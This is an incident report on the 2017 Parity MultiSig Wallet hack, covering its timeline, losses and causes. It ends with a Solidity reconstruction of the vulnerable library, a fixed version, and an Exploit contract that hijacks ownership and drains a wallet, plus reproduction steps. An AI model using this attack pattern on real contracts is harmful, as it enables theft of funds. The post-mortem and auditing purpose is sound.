Parity Multisig Wallet Hack Resulting in a $34 Million Loss

Summary

On July 19, 2017, users of the Parity MultiSig Wallet contract published by Parity Technologies fell victim to a wallet hack. A vulnerability in Parity MultiSig Wallet version 1.5+ was discovered and exploited, enabling the attacker to take ownership of the affected wallet contracts and drain all of their funds. The attack resulted in a loss of 153,037 ETH, equivalent to approximately $34 million at the time, taken from three wallets.

Attackers

The attacker's identity remains unknown. The attacker's main address:

Losses

The attack led to a loss of 153,037 ETH, equivalent to roughly $34 million at the time of the hack. As of July 4, 2023, the attacker still controls 125,995 ETH (over $246 million at that date), held at the following addresses:

The rest of the initially stolen funds were laundered via Tornado Cash and other services.

Timeline

  • July 18, 2017 10:28:36 PM UTC: The attacker executed the first transaction, making itself the sole owner of the MultiSig Wallet.
  • July 18, 2017 10:33:23 PM UTC: The attacker executed a second transaction, transferring the wallet's funds to an address under its control.
  • July 19, 2017 10:50:05 PM UTC: The attacker transferred 70,000 ETH to 7 EOA addresses, 10,000 ETH each.
  • July 19, 2017: OpenZeppelin published a report stating that its own MultiSig Wallet was not affected by the vulnerability.
  • July 20, 2017: Parity Technologies published a post-mortem, stating that the faulty code had been disabled.

Security Failure Causes

Poor Coding Practices: The flaw was in the "initWallet" function of the Parity Multisig Wallet library, the function that sets the wallet's owners and the number of confirmations required to move funds. It was publicly callable and had no guard against being invoked a second time on a wallet that was already initialised, so anyone who could reach it could replace the owner set with an address of their own and lower the confirmation threshold to one.

Delegatecall Use: The wallet contract itself was a thin stub whose fallback function forwarded any call carrying data to the shared library via delegatecall. Because delegatecall runs the library's code in the calling wallet's storage context, and the forwarding applied to every selector from every sender, all of the library's public functions, "initWallet" included, became callable on every wallet by anyone. A single "initWallet" call through the fallback therefore rewrote the wallet's own owner list, and a follow-up call to the library's execute function drained it.
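The two causes above, reduced to a minimal Solidity reconstruction. This is an added example written for this page, not Parity's source: the contract and variable names (WalletLibrary, WalletLibraryFixed, Wallet, Exploit, isOwner, numOwners, required) are simplified stand-ins, execute() is cut down to an owner-gated transfer, and the real library's daily-limit and multi-confirmation logic is omitted. The hardened variant shows the kind of re-initialisation guard that was missing.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Simplified reconstruction for illustration; NOT Parity's source. Names are
// stand-ins, and execute() is reduced to a plain transfer gated on ownership.

contract WalletLibrary {
    // Storage layout must match Wallet below: under delegatecall this code
    // runs against the *wallet's* storage, not the library's own.
    mapping(address => bool) public isOwner;
    uint256 public numOwners;
    uint256 public required;

    modifier onlyOwner() {
        require(isOwner[msg.sender], "not an owner");
        _;
    }

    // VULNERABLE: public and unguarded. Nothing stops a second call on a
    // wallet that already has owners, so the caller can install itself.
    function initWallet(address[] memory owners, uint256 _required) public virtual {
        initMultiowned(owners, _required);
    }

    // Kept internal here on purpose: if this were public too, guarding
    // initWallet alone would leave the same hole open one level down.
    function initMultiowned(address[] memory owners, uint256 _required) internal {
        for (uint256 i = 0; i < owners.length; i++) {
            isOwner[owners[i]] = true;
        }
        numOwners = owners.length;
        required = _required;
    }

    // Once required == 1, a lone owner can move the whole balance.
    function execute(address payable to, uint256 value) public onlyOwner {
        require(required == 1, "more confirmations needed");
        (bool ok, ) = to.call{value: value}("");
        require(ok, "transfer failed");
    }
}

// Hardened variant: refuse initialisation once an owner set exists.
contract WalletLibraryFixed is WalletLibrary {
    modifier only_uninitialized() {
        require(numOwners == 0, "already initialised");
        _;
    }

    function initWallet(address[] memory owners, uint256 _required)
        public override only_uninitialized
    {
        initMultiowned(owners, _required);
    }
}

// The per-user wallet: a thin stub holding the funds and the storage, with
// all logic forwarded to the shared library.
contract Wallet {
    mapping(address => bool) public isOwner;   // slot 0, same as the library
    uint256 public numOwners;                  // slot 1
    uint256 public required;                   // slot 2
    address public immutable walletLibrary;    // immutable: bytecode, not storage

    constructor(address lib, address[] memory owners, uint256 _required) {
        walletLibrary = lib;
        (bool ok, ) = lib.delegatecall(
            abi.encodeWithSignature("initWallet(address[],uint256)", owners, _required)
        );
        require(ok, "init failed");
    }

    receive() external payable {}

    // Catch-all forwarding: ANY calldata from ANY sender is delegated to the
    // library, so every public library function, initWallet included, is
    // reachable on every wallet. msg.sender is preserved by delegatecall.
    fallback() external payable {
        (bool ok, bytes memory ret) = walletLibrary.delegatecall(msg.data);
        require(ok, "library call failed");
        assembly { return(add(ret, 32), mload(ret)) }
    }
}

// The two transactions the attacker needs against a Wallet that points at
// WalletLibrary. Against WalletLibraryFixed the first call reverts.
contract Exploit {
    function drain(address payable wallet) external {
        address[] memory me = new address[](1);
        me[0] = address(this);
        // 1. Re-initialise: attacker becomes an owner and required drops to 1.
        (bool ok1, ) = wallet.call(
            abi.encodeWithSignature("initWallet(address[],uint256)", me, uint256(1))
        );
        require(ok1, "initWallet rejected");
        // 2. As an owner with required == 1, move the entire balance out.
        (bool ok2, ) = wallet.call(
            abi.encodeWithSignature("execute(address,uint256)", address(this), wallet.balance)
        );
        require(ok2, "execute rejected");
    }

    receive() external payable {}
}
```

To reproduce: deploy WalletLibrary, deploy Wallet pointing at it with some legitimate owners and required greater than 1, fund the wallet, then have any unrelated account call Exploit.drain(wallet); the wallet's balance ends up in the Exploit contract. Redeploy with WalletLibraryFixed and the same drain() reverts at step 1 with "already initialised". Two details matter for anyone auditing a delegatecall-based wallet: the guard has to sit on every externally reachable initialisation path, not just the top-level one, and the fallback should forward only the selectors the wallet is meant to expose rather than arbitrary calldata.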